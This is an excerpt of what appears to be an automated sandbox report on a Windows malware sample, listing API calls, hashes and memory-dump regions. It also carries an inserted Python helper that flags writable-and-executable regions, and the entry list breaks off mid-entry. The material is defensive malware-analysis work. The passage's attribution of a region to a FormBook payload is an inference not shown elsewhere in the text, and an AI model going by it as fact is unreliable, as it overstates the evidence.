                                      • Opcode Fuzzy Hash: c20253ac335b2a8ee8ba3202936b2cdb8691aa8ab60debc34aa857a75018fe98
                                      • Instruction Fuzzy Hash: BE11A371600604BAEB215BB6CC49EAFBABDEF85744F10042EF614D1122DA39DD109768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0042F790: CoGetClassObject.OLE32(00000000,?,00000000,00461810,00000003,?,?,?,?,0042F9EC,?,00000000,00000003,00461870,?,?), ref: 0042F7B0
                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0042FB49
                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0042FB6A
                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0042FBB2
                                      • GlobalLock.KERNEL32 ref: 0042FBC0
                                      • GlobalUnlock.KERNEL32(?), ref: 0042FBD8
                                      • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0042FBFB
                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 0042FC17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileObjectOpenStorageUnlock
                                      • String ID:
                                      • API String ID: 3681960158-0
                                      • Opcode ID: 5f726ab22834d1a6264330f1efcc51d5a1e687ade51fe599eb17d476a46907e1
                                      • Instruction ID: d4396a8c99a0fe78b8004d18f2fffcf119ff0ca799d38c6c0adf92e2c278bb8c
                                      • Opcode Fuzzy Hash: 5f726ab22834d1a6264330f1efcc51d5a1e687ade51fe599eb17d476a46907e1
                                      • Instruction Fuzzy Hash: 4AB147B0A0021AAFCB10DFA5D888AAE7BB9FF48304B90447EF815DB251D735ED45CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileA.KERNEL32(00000001,80000000,00000040,0000000C,00000001,00000080,00000000,004297D1,00000000,00000000), ref: 0043E361
                                      • GetLastError.KERNEL32 ref: 0043E36D
                                      • GetFileType.KERNEL32(00000000), ref: 0043E382
                                      • CloseHandle.KERNEL32(00000000), ref: 0043E38D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastType
                                      • String ID: @$H
                                      • API String ID: 1809617866-104103126
                                      • Opcode ID: 91df179f34d13add390b8ef2cf3ec7d7aeb2ff0473b7e67c6d4711c8b689c95c
                                      • Instruction ID: ced1e1128a34a63a781f2a98c70176bc360a36397ac4a1add17a99f7dca4134d
                                      • Opcode Fuzzy Hash: 91df179f34d13add390b8ef2cf3ec7d7aeb2ff0473b7e67c6d4711c8b689c95c
                                      • Instruction Fuzzy Hash: 30815F718062489AEF304BAACC447AF7B645F0D324F1462ABE9616B3D1C37C8D45C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00443353
                                      • CallWindowProcA.USER32 ref: 00443375
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: 1e173f0c99c176eca99fd3243e9242e524e02e853743610a4bb49cb8a90d98b1
                                      • Instruction ID: 8a3463856bcdaaf901367c5ed8cb4a810c22bae2993c5058439ef0589cee3e0e
                                      • Opcode Fuzzy Hash: 1e173f0c99c176eca99fd3243e9242e524e02e853743610a4bb49cb8a90d98b1
                                      • Instruction Fuzzy Hash: D031F6776002106BE3019BA5AC45EDFB75CDF96766F04042AFE0583212D77D9E0A86BB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetParent.USER32(BAADBEEF), ref: 004469C7
                                      • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004469F0
                                      • UpdateWindow.USER32(BAADBEEF), ref: 00446A0C
                                      • SendMessageA.USER32(?,00000121,00000000,BAADBEEF), ref: 00446A32
                                      • SendMessageA.USER32(BAADBEEF,0000036A,00000000,00000001), ref: 00446A51
                                      • UpdateWindow.USER32(BAADBEEF), ref: 00446A94
                                      • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00446AC7
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                      • String ID:
                                      • API String ID: 2853195852-0
                                      • Opcode ID: 4e515cc6230758478cb585541763a43c0a015da5c5ec2cb6ac52ca1b91a39fd6
                                      • Instruction ID: 1ecfded72279192a77f76016244e86c57b20ae6bdd27353a19bf90bdc93037e9
                                      • Opcode Fuzzy Hash: 4e515cc6230758478cb585541763a43c0a015da5c5ec2cb6ac52ca1b91a39fd6
                                      • Instruction Fuzzy Hash: 97416070604B419BE720DF268848B1BBAE4EFC3B05F11491EF481A6292DB79D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetBkColor.GDI32(?), ref: 004402DD
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0044032A
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00440359
                                      • SetBkColor.GDI32(?,?), ref: 00440377
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403A2
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403DC
                                      • SetBkColor.GDI32(?,00000000), ref: 004403E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Text$Color
                                      • String ID:
                                      • API String ID: 3751486306-0
                                      • Opcode ID: 8c0f715314ad55a4180ed3757eff0ae21b8fa8f44b9268149df38decf519f5da
                                      • Instruction ID: 19982ab57f64ae02449c1912e004b90eaa0c0571b9cf996a250abe5e9647ecbb
                                      • Opcode Fuzzy Hash: 8c0f715314ad55a4180ed3757eff0ae21b8fa8f44b9268149df38decf519f5da
                                      • Instruction Fuzzy Hash: C1417C70644341AFE320DF14CC86F2ABBE4EB84B40F14481AFA54AB2D1D774E949CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 004437E6
                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 004437F8
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 00443854
                                      • LocalFileTimeToFileTime.KERNEL32(?,Y7D,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 00443862
                                      • SetFileTime.KERNEL32(00000000,00000000,Y7D,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038), ref: 00443880
                                        • Part of subcall function 0043601C: GetLocalTime.KERNEL32(00443781), ref: 00436029
                                        • Part of subcall function 0043601C: GetSystemTime.KERNEL32(?), ref: 00436033
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Time$File$LocalSystem
                                      • String ID: Y7D
                                      • API String ID: 1748579591-2107304336
                                      • Opcode ID: d68d2b2750b4757c60f3088f70ccb153723fc57832af42855b909bfd152af04e
                                      • Instruction ID: f1a9f31b0cf89d75d10eec25a45aebff7532f903cb9d69f13ca31f84571005b9
                                      • Opcode Fuzzy Hash: d68d2b2750b4757c60f3088f70ccb153723fc57832af42855b909bfd152af04e
                                      • Instruction Fuzzy Hash: 40415A7591420AA9DB04EFA1D9449EFB7B8FF0CB50F04446AE905E7261EB34EA40C7AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindow.USER32(?,00000002), ref: 00433FEB
                                      • GetParent.USER32(?), ref: 00433FFE
                                        • Part of subcall function 00433F77: GetWindowLongA.USER32 ref: 00433F8F
                                        • Part of subcall function 00433F77: GetParent.USER32(?), ref: 00433FA8
                                        • Part of subcall function 00433F77: GetWindowLongA.USER32 ref: 00433FBB
                                      • GetWindow.USER32(?,00000002), ref: 00434021
                                      • GetWindow.USER32(?,00000002), ref: 00434033
                                      • GetWindowLongA.USER32 ref: 00434043
                                      • IsWindowVisible.USER32 ref: 0043405C
                                      • GetTopWindow.USER32(?), ref: 00434082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Long$Parent$Visible
                                      • String ID:
                                      • API String ID: 3473418232-0
                                      • Opcode ID: 6f142e77e8819952e582ba6504c101a87505c71958737715f483414e5016ec74
                                      • Instruction ID: e84c8d87cbdf7277eeb70011959a2305ceda8e4a8008be40c84ddd73d9869745
                                      • Opcode Fuzzy Hash: 6f142e77e8819952e582ba6504c101a87505c71958737715f483414e5016ec74
                                      • Instruction Fuzzy Hash: 6B21D871B047105BD731AE758C4AF6B76BC9F88355F04151AFE4197261C72CEC0187A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCapture.USER32 ref: 0044B78B
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7A8
                                      • GetFocus.USER32 ref: 0044B7BA
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7CA
                                      • GetLastActivePopup.USER32(?), ref: 0044B7ED
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7FD
                                      • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0044B81C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                      • String ID:
                                      • API String ID: 3219385341-0
                                      • Opcode ID: e9f2a069dcd0d9f13dca5ef331a989d814510418098e1a61c74f5a1467328574
                                      • Instruction ID: a6a4467881f0a563eb9e527b8e8497dbea7740f76221082eaf257de480d9ca1d
                                      • Opcode Fuzzy Hash: e9f2a069dcd0d9f13dca5ef331a989d814510418098e1a61c74f5a1467328574
                                      • Instruction Fuzzy Hash: 0911A0762002096BF6106A259C84C3F7A6EDFC2B9AB12483BF40193212DF29DC0246BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowRect.USER32 ref: 00441C90
                                      • GetWindowLongA.USER32 ref: 00441C99
                                      • InflateRect.USER32(?,00000001,00000001), ref: 00441CF8
                                      • GetParent.USER32(?), ref: 00441CFF
                                      • ScreenToClient.USER32 ref: 00441D13
                                      • ScreenToClient.USER32 ref: 00441D1B
                                      • InvalidateRect.USER32(00000000,?,00000000), ref: 00441D31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                      • String ID:
                                      • API String ID: 1809568455-0
                                      • Opcode ID: a68aadb0ce294940913ab76aa593c5946ba7fe4d46ab83dad1e2f242f93b76a8
                                      • Instruction ID: 36ed5c128126340ce13984ecb1c040ca4e452e9c7b4dbc6e076c0ec9d42f7a7f
                                      • Opcode Fuzzy Hash: a68aadb0ce294940913ab76aa593c5946ba7fe4d46ab83dad1e2f242f93b76a8
                                      • Instruction Fuzzy Hash: 1E217971500305AFE304DAA4CCD4FBB73A9EB81721F00091AF552832A2E738E885C766
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0044D618
                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0044D63B
                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0044D65A
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044D66A
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044D674
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CloseCreate$Open
                                      • String ID: software
                                      • API String ID: 1740278721-2010147023
                                      • Opcode ID: de8aa21f3dd514d86e7ceebf770ff6636a4f535fdee3be26648c8111f4ee1fa5
                                      • Instruction ID: 66751f2a136e7859cc7455a2f5af4a9345b45f7e433387b4562e6f341a459d32
                                      • Opcode Fuzzy Hash: de8aa21f3dd514d86e7ceebf770ff6636a4f535fdee3be26648c8111f4ee1fa5
                                      • Instruction Fuzzy Hash: 88110A72D00158FBDB21DB96DC84EEFFFBCEF85745F1140AAA504A2121D3719A40DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0042D4AF
                                      • GetSystemMetrics.USER32 ref: 0042D4C7
                                      • GetSystemMetrics.USER32 ref: 0042D4CE
                                      • lstrcpyA.KERNEL32(-00000028,DISPLAY,00000028), ref: 0042D4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: System$Metrics$InfoParameterslstrcpy
                                      • String ID: B$DISPLAY
                                      • API String ID: 1409579217-3316187204
                                      • Opcode ID: 5b5ebc0d2117855cf25b737ad31cd0bab4692504fede2862c4ef29b995288be7
                                      • Instruction ID: d618f482830a2f1a2c3b7b84c755b3a5851c22dde2dc88aec1e64f3a59e4589d
                                      • Opcode Fuzzy Hash: 5b5ebc0d2117855cf25b737ad31cd0bab4692504fede2862c4ef29b995288be7
                                      • Instruction Fuzzy Hash: D011A771A00334AFCF15AF54AC8469BBFA8EF05751B508067FC059E162D2B5F940CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                                      • String ID:
                                      • API String ID: 2275295265-0
                                      • Opcode ID: 43722693757f858420004bc60e6d24c86fbcfc877668dec827c3890ec8d337a5
                                      • Instruction ID: 3fd99f691f5ebd1b3105e2288219bf726ccbb7b6cefd4d60ca6e9103f36971b3
                                      • Opcode Fuzzy Hash: 43722693757f858420004bc60e6d24c86fbcfc877668dec827c3890ec8d337a5
                                      • Instruction Fuzzy Hash: 05F08C76100302BFE3119B94DCC8EBF37BCEB89722F004529F915921A2D734E8068B76
                                      Uniqueness

                                      Uniqueness Score: -1.00%
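
The "Memory Dump Source" lists above repeat the same nine dump descriptors for every function, and the interesting fact is buried in the file names: the fifth dotted field looks like a Windows PAGE_* protection value, and the region at 0x456000 carries 0x40 (PAGE_EXECUTE_READWRITE) inside a mapping the report marks "based on PE: true". A writable-and-executable region inside an image mapping is the first place to look for a packer stub or an unpacked payload. The helper below is an added example written for this page, not code from Joe Security or from the report; it assumes the descriptor layout `<pid>.<dump no>.<dump id>.<base address>.<page protection>.<type>.sdmp`, interprets only the base address and the protection field (as winnt.h PAGE_* constants), and keeps the trailing field raw because its meaning is not documented on this page. The sample input is the descriptor list copied from the report above.

```python
"""Decode Joe Sandbox-style memory dump descriptors and flag W+X regions.

Assumed field layout (not documented on the report page):
    <pid>.<dump no>.<dump id>.<base address>.<page protection>.<type>.sdmp
Only the base address and the protection field are interpreted.
"""
import re
from dataclasses import dataclass

# winnt.h memory protection constants; only the low byte is a PAGE_* value,
# higher bits would be modifiers such as PAGE_GUARD (0x100).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Descriptor shape taken from the report: 8/8 hex digits, decimal id,
# 16-digit base address, 8-digit protection, 8-digit trailing field.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ident>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\."
    r"(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
)

# Constructed sample: the descriptor list copied from the report above.
SAMPLE_REPORT = """
• Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
• Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
• Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
• Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
• Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
• Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
"""


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    dump_no: int
    base: int
    protection: int
    kind: int  # trailing field, deliberately left uninterpreted

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protection & 0xFF, f"0x{self.protection:08X}")

    @property
    def executable(self) -> bool:
        return (self.protection & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protection & 0xFF) in WRITABLE


def parse_sdmp_name(text: str) -> DumpRegion:
    """Parse one descriptor (the string may carry surrounding report text)."""
    m = SDMP_RE.search(text)
    if m is None:
        raise ValueError(f"no sdmp descriptor in {text!r}")
    return DumpRegion(int(m["pid"], 16), int(m["dump"], 16), int(m["base"], 16),
                      int(m["prot"], 16), int(m["kind"], 16))


def regions_from_report(text: str) -> list:
    """Collect every Source File / Associated descriptor, deduplicated by (pid, base)."""
    seen = {}
    for line in text.splitlines():
        if "Source File:" in line or "Associated:" in line:
            region = parse_sdmp_name(line)
            seen[(region.pid, region.base)] = region
    return sorted(seen.values(), key=lambda r: (r.pid, r.base))


def flag_wx(regions: list) -> list:
    """Regions that are writable and executable at the same time."""
    return [r for r in regions if r.executable and r.writable]


def triage(text: str) -> dict:
    """Summary a reader can act on: how many regions, and which ones are W+X."""
    regions = regions_from_report(text)
    return {
        "regions": len(regions),
        "executable": [f"0x{r.base:X}" for r in regions if r.executable],
        "wx": [f"0x{r.base:X} {r.protection_name}" for r in flag_wx(regions)],
    }


if __name__ == "__main__":
    for r in regions_from_report(SAMPLE_REPORT):
        mark = "  <-- W+X, inspect first" if r.executable and r.writable else ""
        print(f"pid={r.pid} base=0x{r.base:08X} {r.protection_name}{mark}")
```

Running it over the report's own list yields nine regions, two of them executable (0x401000 as PAGE_EXECUTE_READ, the normal `.text` mapping, and 0x456000 as PAGE_EXECUTE_READWRITE); the W+X one at 0x456000 is the dump to open first when looking for where the FormBook payload was unpacked.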

                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044904C
                                      • GetSysColor.USER32(00000010), ref: 00449053
                                      • GetSysColor.USER32(00000014), ref: 0044905A
                                      • GetSysColor.USER32(00000012), ref: 00449061
                                      • GetSysColor.USER32(00000006), ref: 00449068
                                      • GetSysColorBrush.USER32(0000000F), ref: 00449075
                                      • GetSysColorBrush.USER32(00000006), ref: 0044907C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Color$Brush
                                      • String ID:
                                      • API String ID: 2798902688-0
                                      • Opcode ID: 60c10ff6a55392d29506e87486369c4c1ba64106531382c9855b071ae32116ff
                                      • Instruction ID: a9a3f7d6c0da977067b7d7f9e5e0febf63504ec1939addfc6cd9e98c9eff6c03
